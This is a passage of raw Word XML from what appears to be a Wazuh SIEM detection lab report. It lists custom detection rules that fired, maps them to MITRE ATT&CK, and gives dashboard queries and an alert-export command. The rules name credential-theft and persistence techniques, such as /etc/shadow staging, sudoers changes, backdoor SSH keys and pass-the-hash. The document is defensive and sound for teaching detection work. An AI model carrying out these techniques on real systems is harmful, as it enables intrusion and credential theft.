    <w:p w14:paraId="5D2C1607" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1608" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9. Detection Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1609" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>9.1 All Rules Fired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3400"/>
        <w:gridCol w:w="1360"/>
        <w:gridCol w:w="2200"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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0A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153"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0B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153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0C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="0017415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0D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>MITRE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58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0E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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0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1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2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SSH brute force: 8+ failures from same source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3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T1110.001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4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>auth_failures, pci_dss_10.2.4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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6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7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8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>SSH brute force targeting root account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9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T1110.001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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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C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D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E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>New user account created via useradd/adduser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1F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T1136.001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0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>account_creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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2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3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4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Password hash written — passwd executed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5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T1136.001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6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>account_creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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8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9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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/etc/shadow modified — new password hash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B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T1003.008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C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>credential_access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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E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2F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0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/etc/passwd modified — new account entry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1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T1136.001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2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>account_creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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4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5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6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>User account modified via usermod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7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T1548.003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8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>account_creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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A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B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C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Shadow file copy in /tmp — credential staging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D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T1003.008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3E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>credential_access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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0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100116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1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2" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Sudoers modified — privilege escalation path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3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T1548.003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4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>account_creation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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6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100201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7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B5E20"/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8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Samba NTLM auth rejected — PtH indicator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9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T1550.002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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>smb</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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C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100300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D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1B5E20"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19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E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>New file in /tmp — staging or dropper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4F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T1074.001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0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>file_staging</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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2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100301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3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19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4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>authorized_keys modified — backdoor SSH key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5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T1098.004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6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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8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85FA5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>100303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9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="7B4800"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Crontab modified — scheduled persistence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B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="185FA5"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>T1053.003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5C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="555555"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t>persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C165E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3956AED7" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DD200A8" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7462011D" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BCEC114" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2986AEBD" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D25A475" w14:textId="77777777" w:rsidR="00174153" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C165F" w14:textId="2EEA4A00" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9.2 Dashboard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E3256E" w14:paraId="5D2C1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661" w14:textId="3DD68BE4" w:rsidR="00E3256E" w:rsidRDefault="00174153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6A29AC2" wp14:editId="329AF726">
                  <wp:extent cx="5926455" cy="2811145"/>
                  <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                  <wp:docPr id="70351541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81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663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9.1 — Wazuh Threat Hunting dashboard: total events, auth failures, alert group evolution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E3256E" w14:paraId="5D2C1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665" w14:textId="09A6894D" w:rsidR="00E3256E" w:rsidRDefault="00174153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6D94710" wp14:editId="5085A86B">
                  <wp:extent cx="5935345" cy="2844800"/>
                  <wp:effectExtent l="0" t="0" r="8255" b="0"/>
                  <wp:docPr id="74342520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667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9.2 — Threat Hunting Events tab: full event feed with rule IDs and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E3256E" w14:paraId="5D2C1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5D2C1669" w14:textId="455B71F2" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:pPr>
              <w:spacing w:before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F3BE2E" wp14:editId="4915485B">
                  <wp:extent cx="5926455" cy="2827655"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="91601988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82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C166B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="60" w:after="160"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="777777"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Figure 9.3 — MITRE ATT&amp;CK tactics auto-mapped: Defense Evasion, Privilege Escalation, Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C166C" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>9.3 Overall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3256E" w14:paraId="5D2C16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6D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TTPs Simulated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6E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>9 distinct MITRE ATT&amp;CK techniques across 5 phases</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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0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Custom Rules Fired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1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>13 of 13 — 100% detection rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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3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Total Events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4" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>1,070 in 24-hour window</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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6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Auth Failures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7" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>32 (brute force + SMB spray)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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9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Auth Successes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A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>142 (Samba sessions + SSH logins)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C16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C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Detection Latency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D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Under 30 seconds from attack to alert in dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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7F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Severity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0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Level 8 (Low) to Level 14 (Critical)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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2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MITRE Tactics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3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Credential Access, Discovery, Privilege Escalation, Persistence, Lateral Movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1685" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C1686" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>9.4 Compliance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3256E" w14:paraId="5D2C1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7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PCI DSS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8" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>10.2.4, 10.2.5, 11.5, 2.2, 8.1.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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A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GDPR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B" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>IV_32.2, IV_35.7.d, II_5.1.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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D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HIPAA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8E" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>164.312.c.1, 164.312.c.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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90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NIST 800-53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91" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>SI.7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E3256E" w14:paraId="5D2C1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93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TSC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94" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
            <w:r>
              <w:rPr>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PI1.4, PI1.5, CC6.1, CC6.8, CC7.2, CC7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C1697" w14:textId="310C89F5" w:rsidR="00E3256E" w:rsidRDefault="00174153" w:rsidP="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3585F9"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>10. Dashboard Queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1698" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>se these queries in the Wazuh Dashboard → Threat Hunting → Discover tab. Set time range to match your simulation window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C1699" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C169A" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>10.1 Quick Verification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69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All lab alerts:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C169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rule.groups: "lab_attack"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C169D" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C169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Phase 2 — SSH brute force:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C169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rule.id: (100100 OR 100101)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16A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Phase 4 — User creation chain:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A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rule.id: (100110 OR 100111 OR 100112 OR 100113 OR 100114 OR 100115 OR 100116)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A3" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16A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Phase 5 — Persistence:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A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rule.id: (100300 OR 100301 OR 100303)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A6" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16A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All critical alerts from lab:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A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rule.level: [12 TO 15] AND rule.groups: "lab_attack"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A9" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16A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Filter by attacker IP:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A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data.srcip: "KALI_IP"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16AC" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16A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Credential access TTPs:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16A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rule.mitre.id: T1003.008 OR rule.mitre.id: T1110.001 OR rule.mitre.id: T1550.002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C16B0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D2C16B1" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="4" w:space="2" w:color="DDDDDD"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>10.2 Export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6B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WAZUH_IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B3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curl -sk -u admin:YOUR_ADMIN_PASSWORD \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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'https://WAZUH_IP:9200/wazuh-alerts-*/_search' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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-H 'Content-Type: application/json' \</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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-d '{</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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"query": { "match": { "rule.groups": "lab_attack" } },</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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"size": 500,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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"sort": [{ "@timestamp": "asc" }]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16B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}' | python3 -m json.tool &gt; ~/lab_evidence.json</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D2C16BB" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00E3256E">
            <w:pPr>
              <w:spacing w:before="80" w:after="20"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5D2C16B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"Exported: $(wc -l &lt; ~/lab_evidence.json) lines"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D2C16BE" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16BF" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>11. Lab Cleanup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2C16C0" w14:textId="77777777" w:rsidR="00E3256E" w:rsidRDefault="00174153">
      <w:pPr>
        <w:spacing w:before="80" w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
